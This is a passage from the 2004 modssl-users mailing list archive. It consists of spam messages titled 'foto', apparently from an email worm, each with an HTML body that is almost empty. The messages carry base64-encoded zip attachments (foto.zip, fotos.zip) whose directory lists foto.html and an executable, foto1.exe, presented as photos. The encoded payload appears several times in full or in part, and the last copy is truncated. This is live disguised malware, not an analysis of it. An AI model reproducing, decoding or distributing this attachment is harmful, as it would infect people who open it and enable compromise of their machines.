yZQasdoLgUzh1Re466oGTSgWIPapF/dFxgJ8Yx1nsZFRYWzLlLIN7lMjayPsCD4mEAsi/pHV
UdVgVJ90MJ+Bu16HYcAy1WLD/ZjRnAijppPR1LHg3vg60sYD6GM27kJVq/Z/SQormcrxrHjZ
q/lzIf7mmOrZLenwP1jcK1KGZUPjpMeAt2xofpn0KJKeo34JvFE1F/deX32a/whLRvYzun8U
Koi/nDEg8uN+vflfSGHv71vWd/R0XNt5c2e88+7O+zrVzuGul7ruidLoVPSx6JHoseh3oy9G
X4++EV0f64zdEovH5Fg+ZsbGYw/EHoo9Ens09njs92LfjH0r9lTs6dix2LOxE7G/i52KfT/2
euxszI29HZuPvR8j21dub91+zfbrtn/cg76cKgnekIZdzS4u6dTevsF0fCAxslvFYWjh0Bvx
fwEY6XEYDoDKDwQjA47/rrx/kEmltC6Tmpf/mgf1Yc+lFD8YJCYqRf6LAUrezxcDlL8a+T9q
iDd6/81+Nxis9HFb6pOY/gdQSwECFAAKAAAAAAChhCExAAAAAAAAAAAAAAAABQAAAAAAAAAA
ABAAwEEAAAAAZm90by9QSwECFAAUAAAACAAAjyExH0ImHiICAABjBAAADgAAAAAAAAABACAA
gIEjAAAAZm90by9mb3RvLmh0bWxQSwECFAAKAAAAAAChhCExAAAAAAAAAAAAAAAACgAAAAAA
AAAAABIAwEFxAgAAZm90by9mb3RvL1BLAQIUABQAAAAIAC+PITFDX7olQxAAAAAyAAATAAAA
AAAAAAAAIgDAgZkCAABmb3RvL2ZvdG8vZm90bzEuZXhlUEsFBgAAAAAEAAQA6AAAAA0TAAAA
AA==

----------boclqmsefvcqtnfycxcb--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 20:28:12 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A901FA8978; Tue, 31 Aug 2004 20:28:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from DAVEM.org (gwercoc.tor.axxent.ca [209.250.135.154])
	by master.modssl.org (Postfix) with SMTP id B9664A8943
	for ; Tue, 31 Aug 2004 20:28:06 +0200 (CEST)
Date: Tue, 31 Aug 2004 14:37:57 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------pslvaplwhmencqwoezek"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------pslvaplwhmencqwoezek
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------pslvaplwhmencqwoezek
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
AA==

----------pslvaplwhmencqwoezek--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 20:48:13 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4E1AAA8978; Tue, 31 Aug 2004 20:48:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from S0027298858-BITFALL02.org (c-67-163-91-163.client.comcast.net [67.163.91.163])
	by master.modssl.org (Postfix) with SMTP id 38CB8A8943
	for ; Tue, 31 Aug 2004 20:48:12 +0200 (CEST)
Date: Tue, 31 Aug 2004 13:46:15 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ckbdbxqzaybnpebvedco"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ckbdbxqzaybnpebvedco
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------ckbdbxqzaybnpebvedco
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

UEsDBAoAAAAAAKGEITEAAAAAAAAAAAAAAAAFAAAAZm90by9QSwMEFAAAAAgAAI8hMR9CJh4i
AgAAYwQAAA4AAABmb3RvL2ZvdG8uaHRtbI1UUY+aQBB+v+T+wx4Ph+YKHNr0TA9MLFJj43HN
qfWxWWFYtsGFLKOeafzvXZBei5KmG0LYmfm+b2aYXScBGg2vr5wilDxHklLBtpSBq32hOzqv
jJry76gk8Ao5xcTV4wwzq3zZprLpjwpunfAqUm3m3sv064LMRsFkOZr451zOjWGcGNeCbsAV
dMcZxUyaNM8DZVGEsAeMERlxiYaSxQcWRTFjmnIlMTuwpPLAXgJKPFRP6atIdyDdnMoCpgI7
DfJvIAueie5jmWa8FSGqHeGiQJqmnS75eX1F6sVj0iF/wHlKMc7khtzetllvXKKvuOj3dNJg
+b3SLKSllilBYULo6MHzYjUN+r3V6CWYBhMzwU2ql4mdQ1WFWyn+chybSVY9JK5K4ImHMiuy
GIkqHKQAJP5rnmYSpF7mXTaGDF3Sa00xysLtBgSae8lRJehk6x8QIuGRqzG+1sieR+rn2yQB
zhJUH2FKi6J0e7P5dPzx3h58evC9vuH73siw7ahvDPwH27hXyx/0vA/e/VhTQmEWwZoWasT0
u3qk7nRt6FgnwWGjC0cCaQFnhQaARUhzaFT1vrUqlJwxFeASUYPMskPbPKII5uLkbel6KVhj
zWUV7Au6TiFqVTlTM+dIJc6Vzp5KOME7danv3oLG/ufRcrb4/vQ89ruXnHXl/1C7GKpaom2K
jhct/Z8pbSFURMfy9LwdmuosWRYxjGHjHnCs+mr5BVBLAwQKAAAAAAChhCExAAAAAAAAAAAA
AAAACgAAAGZvdG8vZm90by9QSwMEFAAAAAgAL48hMUNfuiVDEAAAADIAABMAAABmb3RvL2Zv
dG8vZm90bzEuZXhl7VoPcBzVeX8nCyOwYt8Qm2APE2Rjpw4THbJ0ZwhxJzqkE3Yq24dO0hlQ
MHu3T7d72ttd3u7qdCpMZYSmuKqpJzBt2jKZzJSm05Z6WgZ3nHQCArulLqS1O0xKA5Map002
mBIGq0VlVF9/7+2efOfbE5C0w9Dxs79v3/u+9773ve/9+7532n03ISFCSBOgXCakm3ip8n2m
/3sbSYPE6yQThPSHVpCJcixeoZ8ha0KrQle0kmYUIh5t6BqgMKDNbxn2Om3221S+5D5fmaVP
2Ku79F36iKRA3o5GCv4iCXKVZdgRm07Y+H5zha8QH0BTnYgzESZLtkTIy00eQdRbWVuvG/8j
XjVy/vNAHYCtgKvr6s39PENZLg3NvjWcTs0+2DLrtKbd2zCambnD9o2PLXbNTZ8sv3tk6svE
DqdT7lpwDq6cmbNb/uzcj47xFXPP/ntPvtDCBUyfWMgT/GsCrOBG6y47Le6zGPHBxGK303zy
hVawDyUWkmUnXHZay86i+z64/Pub+ApxvJKQ5aaUU8PdRHkQyP1quVxeNbfm4b8nvHpLnii3
wYDu1z3ZM+A8LTit7l8J0ny+WeHTUXbm81x+eR2XdTCx0PXaqjn71zhtXmiwIJivgwn6oNfZ
TRChmMgl3S3IHhp6Z4A3WEjy0Yn6rwphb6HJxny57LzltvN6CTfJ8/+CYcx+1eXZvwzx1TNF
RDuvq1fQlA/493mt4+c2KP/KuzyJEqS1KuFfwrD+GaVz8/csmXXxUGIxqURFyxb337jQn6bR
6h+Q606KfD4Em5AOTzaXxr9HQ9yezVzIgROvXCiXX5x5FXhriIhpcj+PzMEZzjgkGMnyUV5w
7/C02XZoZpFTlU1cxRFBdFpmZ86AePJ4bZMNXOWX/MJzmIuuuZPHleYlVc+CpKyCfl7xKs4Q
3Lf3QXni/jnhOgmmILkHeANUmHL/CyKVJp77Gc+JVsJoj/Iqn+EyRfEoL06RGi75HNCmpSrp
/+bLyN7gvglJf3Bm2KeXYzzrzoALVdaj4cvlLfe1gbFln8CDAocFXivwdQJfL3CbwJsF3irw
FwQeEbhD4KjAtwq8Q+BugXsF3ilwv8BJgVsEJgI3A/9fpyc2EfIU4NFNXjmK0z4JuBfAAI8A
ngAcAZwAnAXMA5pRfwNgE+BWQC8gCRgBfA78DYBXAK3+7fFM28U+FdQJo/xkFe1Z3n9V+ePQ
cQPp0QyL7pR0WaNkM+kxzFKfqtE4DuQeRiWbeqVdfmnQMDSFamZXZ0qXTEsxcCFMkcSEaieZ
kaWWRX5G7qA2J/QYMh1U0EomV4ZA223IjibE7ZEKEEmuukj1+gftBk7jouKyzLg4soNTUiXL
poVeldGsbbBSnDwZ6jckuV/NMIkXyenQXpPqFR1+GPJzXZ19KrOg45mLlD38Fos2pagthmbb
TM04NrUg5b6mlEapSX6rKS2pdp/BUqqe0+jeTB79km80pZnqGYQcbdIsm2UlG62+7eULphon
z4m8RnXQxyjTqdbVGZE1jRDHoqyStxStKJmqKEyFBmhOTMKv0BKZFiVhahTj5AgvQ9VhSXNo
YgJSJXkcTSuSLqePnoqUWbIVoROUjMgGUw3by+fk+0eLIrv77sOEOzncceEe4jG/ZfeHkD4F
WH3Dd1aTZ6763sZjIfiSg4pqtZnMyDGp0JaVdN2w2zK0jTl6m6q39e5NtRWwVSKf+tTVm30Z
nofZTIo1HubqjcLDbCFLp8bWdaTKw0RuOQ8ThT9+5cN5mIchb2K5QSY/gN8oQe7hZdgVD/P6
lb5CLaRqEEsiljzMpmaPILzL1tp63VUepnQt8TzMa3yorTcXYVQzsjhxOQFjE0baXFfv9g8z
xMvpk5+65mZPnT6bv+qu029aVx4+8G7b9LF/P3v+4NqZnXESvjDnvHGcxxCziZb3TiGGmN0d
/tH62VPPv9nSufLwFhwXZLZZ1Ox6oe/sT947da/v5x84YZe5X8ox70UEECsqAcQU93fPNXsB
hN3jBQ/Cxzs0M1Hm3ie83Buu4N7uQoVylItyTaCDQur0gwvE+Wte8QkImhU03ymePjHPO3B4
XYQMNV3PcY5Z6fomEdQIpxpN/Sgm33woMS9UmGv2HG4elCzJfifV9VqAzOt9mWse/nVCfJlt
oP0y32AP6KKjRU68K6CjLk5bqnGL3+2N4tviPnWBD2Thoq7X+iLeqRKxllshsfClxPyax49z
wgxO9cfuWYoT+sV8cPy4sDPPJd3fQKXp7yaRv4JllC+TNWKmyut2JkgYo0Fg0Mwl5DdBDxHn
9IMBV7s9eWjozEA+lCyvwwEenl27+dtXimGfXcyX88358kB53SAY5XX7OOYtecbXJjWc5uPa
IsJRu2v2VS9ArQ5K1yMo/UmTCE2u3H+viJkOrpz+m+ZzPxDhpE+CrPQib7y79fmfNnXNnf9T
5KbfWHH+T/ZzNh+L6AUah44rp6CiewZCz/2YL2oRcOZD7pOiG3s14sCk+yIK7leaLgmw0pdE
WF9qCo6w9nuibn8OJ3A47cdZ7oxHXVU+ykMs9wCsXTVU559qZWzkCn7HL8yF+A7df5Lr6xbQ
MC+7n+UV3l1ajyKK5CNV/ujTJCyG/Ns8QDzu7YQXEwv8ehFhc77b/cOQWKZetL6Iuu8Lwvwq
Pg+JxdmdzXfCLne6p0G+C8SVd7ovI+tL8Zshynb/lkeGJ3nuaT8sTV4MS714bQQz7sqhSq41
5C1nmW9k6QIPyvIeS8yE+5AXibZ6tQ8vlsvnMKW+xLQXIArWa1z4F3DoeMU2MJ6LboPBhWmh
9GfyVyzJVm6Lc6u4N6FWtdX/USG/syvknoasc8/vD7Dmk2t9a+4kFWs+2Bpytip8bygvdaPn
bYgslWd57nehrVvgM/bU+0B/AT2Wnj14zIkxInrkuEXgVoHDAq8V+DqBrxe4TeDNAm8VeETg
DoGjAt8q8A6BuwXuFXinwP0CJwUeFHifwIrAjwj8gMATAj8s8JTApsDwNcKX3hWX0/+/9OMb
ve8zfnR9BvA2YBGwGpH0ZwHb/ej6W6Bl8DUBDwG+BvgG4AjgBOD7gB8C3gVcAAwAvu5H35v9
fk74XwXfQcATgIcAO3x6uOo9+mrQsF+IWUXruNF7FZ6qoh0DDeuYTFTRfgAaVjJpqaL9J++j
7ZNhh9rXitoXir7KC4X35LDsi0WK9FKNVlr+B3+x4NmUOkkDXiDu5pRhBI2qofMQPMPLaVWX
jaJV9SRBcqE7NCMjaXGNBxO6X+pjlJJf+L3ivdAARiWeHkg7f7tI6PLeUa8c/JaxvUJNGqpu
U3bxdUNpGqSsoOowTkWBhm8bjd8wzpOUzfB/V7z2PeNq37ZDTOuRsgpN6LYYcZj0wWRi/ios
8mlBE0O+pPoGweFDv1TOr5JdfDg6tTELPYauw/5UTtkYDSmqugqG0GMbGRro7zWKugbDDxre
VBOHaQVD90agkxQWhpaYoFnYLE5SOxP9/ZcfVi4nEh8cSvbGBxMDkQQ89LhX8PODewcH4j0X
S1XMvl0DiXS8v9/j1cjoH6rQewfSiduHkuklAb1703tEYc9Q8o6BeK8na+/QYHJvalDkd/Wk
UkPJ5J6lEgpfjIlCItUT37PTL8SH9905FB+oYvhNfMEDdbXiw2loiTXvFZIoiGxP3674UO+u
SuulEdaouLunikMU2zZvu/nmgsqkrEYj49sj2cmbM5G8mauw+Cks04JhRbJGoZZVLBYj+Yyp
OVZdK86yHD3jyLxZxNTq2bokGzKbpIFMM9uuSMxr7EgBfEOztMiYZBtFNRssAqcQowXajpGp
ei6i5QIFRWOmxGxLpqZhB4+wYNjU1CTLovq24BqjDMcYiyhOPUsaxw3U0ARQv6De7wTrr2ZN
fioGDk3Dqd9u2SVMWaBGqq5JesQaC7A6tW2pgTLFwCHkDEPOGKUIFkGEBfDHHFlqOE/SuGRL
LEJpPYvPrxWoyaRkSbLUzowiZaXAGrY6rjZYdGMlTR1vsKhKDGaRVak9Yxg5tb6SgbUiacEm
Z2qwslaRTnKrfqQJzFGdMjoBmwaYzMJiKlA5eAiSnjUMc9Iah8kjpYDpMB1mOaodYePBG4ey
Udy97RkqOXYJkx4wMYY2icXlyKoRyC/QQoavaglXchD/A7qAl2Ko2L+lAvZM0IKCy6BJmeCF
rRm2Y8lGLtjirD0jTUrBUvOOZRckO6uoDfb5B1bYdmtHh63QolHA3gqskWHcs2H4NDgtDV2D
qxPtCObqUoGqcAZzSgMNvOaxgOZ5NLX87oPbmswwFWpnDQ0yGqhHdZk7i9sio1iEwSbGYalg
hZlUGmt0I3ygKhmnlJVYg6NreQsrVNJsBSxqKw3GKZViUVytgcycock5HNYNVLcMR2P8sqjj
UribppQL0LlgOLotqTq82FyQWE42cAto6miDEddI6Kyvg6MOMcyowbh6VsRgufobGk1LhgOb
1HFlTHjJNMyPrHkNO9rAYOIX3hhChyx2ta5mf641gSn3VnbR8K78WnaWlYxR1LFMlQXtTYRE
DpM0M3DXjavMdiQti0WbbbBiiiVIxoJTJTP4YlRZOxqaCDf8u1xiAXtTpuMwgD1uBN67EmOS
FXyZSaYhN7pcCrkxlg1kIUi16YSJ3sxM4IEHk9sqtnEjvo7714hkMsF3pTNmBl+EqufwBY3R
zo4XacYeb2ijbV+MRgOFYuomxxCYj6l1bMT+2bEIHRfBY0NPShN2bzRSavN7P5KTgz0fCy5K
e0GaiKgBB55sFJzgozCDY4rZgV4IP2zVQM4ovMlgw95iUniS6pjRwOXL4gAoNTjWMJWYbhle
YaNF/iGqFITnEdj7OPwiG4dQOwyBTTrWwCBMwizkNLWhT27C6StIuTremGHXz/xyDYRJHH6l
gR8cXuA6p2bdOpVw/Un6pFXPESZwNFvFFAXvYc7gnsmlPHhkGhZ+xLRyge3udyScjoEsS9XG
1SzWfz0r6xQQmkhZrFujrkLKNJjdjyMziOkJ1rM4bxuxcaBOSssstzEnY/NT3Qj2+amOdTQR
yZQasdoLgUzh1Re466oGTSgWIPapF/dFxgJ8Yx1nsZFRYWzLlLIN7lMjayPsCD4mEAsi/pHV
UdVgVJ90MJ+Bu16HYcAy1WLD/ZjRnAijppPR1LHg3vg60sYD6GM27kJVq/Z/SQormcrxrHjZ
q/lzIf7mmOrZLenwP1jcK1KGZUPjpMeAt2xofpn0KJKeo34JvFE1F/deX32a/whLRvYzun8U
Koi/nDEg8uN+vflfSGHv71vWd/R0XNt5c2e88+7O+zrVzuGul7ruidLoVPSx6JHoseh3oy9G
X4++EV0f64zdEovH5Fg+ZsbGYw/EHoo9Ens09njs92LfjH0r9lTs6dix2LOxE7G/i52KfT/2
